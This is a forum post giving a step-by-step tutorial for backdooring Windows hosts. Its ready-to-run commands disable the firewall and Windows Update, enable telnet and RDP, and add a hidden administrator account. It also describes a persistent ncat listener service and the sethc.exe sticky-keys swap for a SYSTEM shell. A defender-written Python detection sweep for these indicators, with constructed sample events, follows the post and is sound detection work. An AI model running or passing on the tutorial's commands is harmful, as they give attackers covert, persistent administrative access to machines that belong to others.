Windows Remote Desktop Backdoor

Discussion in 'Network' started by Asphyxia, Oct 18, 2016.

  1. Asphyxia (Web Admin, Administrator, Super Mod)

    USEFUL LINKS FOR MAINTAINING ACCESS
    Non-Sucking Service Manager // http://nssm.cc/
    NCAT // http://nmap.org/ncat/

    TUTORIAL
    I wrote a private tutorial on this a while ago and now I'm just going to publish it because no one else had something written as to-the-point and helpful as what I had written.

    1. Run all of this shit:
    Code:
    sc config wuauserv start= disabled
    net stop wuauserv
    netsh firewall set opmode disable
    sc config tlntsvr start= auto
    net start telnet
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    net user support1 passwordA!1 /add
    net localgroup "Administrators" /add support1
    net localgroup "Users" /del support1
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v support1 /t REG_DWORD /d 0 /f
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f
    net user support1 passwordA!1 /add --- this line creates the user with the username of support1.
    I grabbed this from: http://www.windows-commandline.com/enable-remote-desktop-command-line/

    2. Make sure the Terminal Service is running because the Terminal Server is what Remote Desktop runs as. Do this stuff:

    3. Go ahead and try it; if it doesn't work, try rebooting/restarting the server and it should work, or at least try stopping and starting the termservice.

    ADDITIONAL HELP
    Quote:
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp\PortNumber
    is the location of the Remote Desktop port. If you find a program that is running on port 8080 or even port 80 and switch the Remote Desktop port over to 80/8080, this bypasses the need to port forward, and since by default you can't back-connect or reverse-connect using Remote Desktop, this makes sense.

    Lastly, use the NSSM to make ncat listen as a system service each time the computer starts up. This makes maintaining access very easy.

    Alternatively, you may be interested in enabling the Remote Desktop service, renaming sethc.exe inside the Windows system files to sethcbk.exe, and copying cmd.exe to sethc.exe. You will now connect to Remote Desktop and, so long as authentication before screen view isn't enabled, you will see an ACTUAL screen with a login box. Tap Shift five times and enjoy having a cmd window open with system-level access. A simple and silly Windows fail.
     
    Last edited: Oct 18, 2016
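Every step in the post above leaves a host-side trace: a new local account that lands in Administrators and leaves Users, the fDenyTSConnections, SpecialAccounts\UserList, dontdisplaylastusername and RDP-Tcp\PortNumber registry writes, a file-create on System32\sethc.exe, a service whose binary is nssm.exe or ncat, and the netsh/sc commands that disable the firewall and Windows Update and enable telnet. The detection sweep below is an added example written from the defender's side; it is not code from the post or from NSSM/ncat. It runs over a list of normalised event dicts whose field names (event_id, user, group, path, details, target, image, service, command) are this example's own convention loosely modelled on Security 4720/4732/4733/7045 and Sysmon 1/11/13 fields, not an official schema, and SAMPLE_EVENTS is constructed data that replays the post's sequence plus two benign events that must not fire.

```python
"""Detection sweep for the RDP backdoor indicators described in the post:
hidden local admin, RDP enabled/re-ported via the registry, sethc.exe
replaced, an NSSM/ncat service, and the firewall/update/telnet changes.

Field names are this example's own normalisation convention (assumption),
not an official Windows or Sysmon schema. SAMPLE_EVENTS is constructed.
"""
import re

# Sysmon EventID 13 renders DWORD data as "DWORD (0x00000000)"
_DWORD_RE = re.compile(r"dword\s*\(0x([0-9a-f]+)\)", re.I)


def _dword(details):
    """Extract the integer from a Sysmon DWORD rendering, or None."""
    m = _DWORD_RE.search(details or "")
    return int(m.group(1), 16) if m else None


def _reg(path):
    """Fold case and the HKEY_LOCAL_MACHINE/HKLM spelling so rules match either."""
    return path.lower().replace("hkey_local_machine\\", "hklm\\")


def check_registry(ev):
    """Return a description if a registry-set event matches one of the post's writes."""
    path, val = _reg(ev["path"]), _dword(ev.get("details"))
    if path.endswith("\\terminal server\\fdenytsconnections") and val == 0:
        return "RDP enabled via fDenyTSConnections=0"
    if "\\winlogon\\specialaccounts\\userlist\\" in path and val == 0:
        return "Account hidden from logon screen: " + path.rsplit("\\", 1)[1]
    if path.endswith("\\policies\\system\\dontdisplaylastusername") and val == 1:
        return "Last logged-on username suppressed"
    if path.endswith("\\winstations\\rdp-tcp\\portnumber") and val not in (None, 3389):
        return "RDP port moved to %d" % val
    return None


def check_command(ev):
    """Return a description if a process command line is one of the post's setup commands."""
    cmd = " ".join(ev["command"].lower().split())  # collapse whitespace variants
    if "netsh firewall set opmode disable" in cmd:
        return "Host firewall disabled from the command line"
    if "sc config wuauserv start= disabled" in cmd:
        return "Windows Update service disabled"
    if "sc config tlntsvr start= auto" in cmd:
        return "Telnet server service enabled"
    return None


def analyze(events):
    """Return (rule, detail) findings; the account rules correlate across events."""
    findings, created = [], set()
    for ev in events:
        eid = ev["event_id"]
        if eid == 4720:                                   # local account created
            created.add(ev["user"].lower())
        elif eid == 4732 and ev["user"].lower() in created \
                and ev["group"].lower() == "administrators":
            findings.append(("new local admin", ev["user"]))
        elif eid == 4733 and ev["user"].lower() in created \
                and ev["group"].lower() == "users":
            findings.append(("new account removed from Users", ev["user"]))
        elif eid == 13:                                   # Sysmon registry value set
            hit = check_registry(ev)
            if hit:
                findings.append(("registry", hit))
        elif eid == 11 and ev["target"].lower().endswith("\\system32\\sethc.exe"):
            findings.append(("sethc.exe replaced", ev.get("image", "?")))
        elif eid == 7045:                                 # service installed
            img = ev["image"].lower()
            if "nssm" in img or "ncat" in img:
                findings.append(("nssm/ncat service", ev["service"]))
        elif eid == 1:                                    # Sysmon process create
            hit = check_command(ev)
            if hit:
                findings.append(("command", hit))
    return findings


SAMPLE_EVENTS = [  # constructed: the post's sequence, then two benign events
    {"event_id": 1, "command": "sc  config wuauserv start= disabled"},
    {"event_id": 1, "command": "netsh firewall set opmode disable"},
    {"event_id": 1, "command": "sc config tlntsvr start= auto"},
    {"event_id": 13, "path": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections", "details": "DWORD (0x00000000)"},
    {"event_id": 4720, "user": "support1"},
    {"event_id": 4732, "user": "support1", "group": "Administrators"},
    {"event_id": 4733, "user": "support1", "group": "Users"},
    {"event_id": 13, "path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\support1", "details": "DWORD (0x00000000)"},
    {"event_id": 13, "path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\dontdisplaylastusername", "details": "DWORD (0x00000001)"},
    {"event_id": 13, "path": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber", "details": "DWORD (0x00000050)"},
    {"event_id": 11, "target": "C:\\Windows\\System32\\sethc.exe", "image": "C:\\Windows\\System32\\cmd.exe"},
    {"event_id": 7045, "service": "ncat", "image": "C:\\tools\\nssm.exe"},
    {"event_id": 4732, "user": "jsmith", "group": "Administrators"},  # pre-existing user, benign
    {"event_id": 13, "path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU\\NoAutoUpdate", "details": "DWORD (0x00000000)"},
]

if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVENTS):
        print("%-32s %s" % (rule, detail))
```

The account rule only fires for a user whose 4720 was seen earlier in the same stream, which is why the jsmith group change stays quiet; in production you would key that state by SID and let it expire. Hashing System32\sethc.exe against the known cmd.exe hash, and comparing the RDP PortNumber against an allow-list, are the two checks worth adding to a periodic host audit on top of this event-driven sweep.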
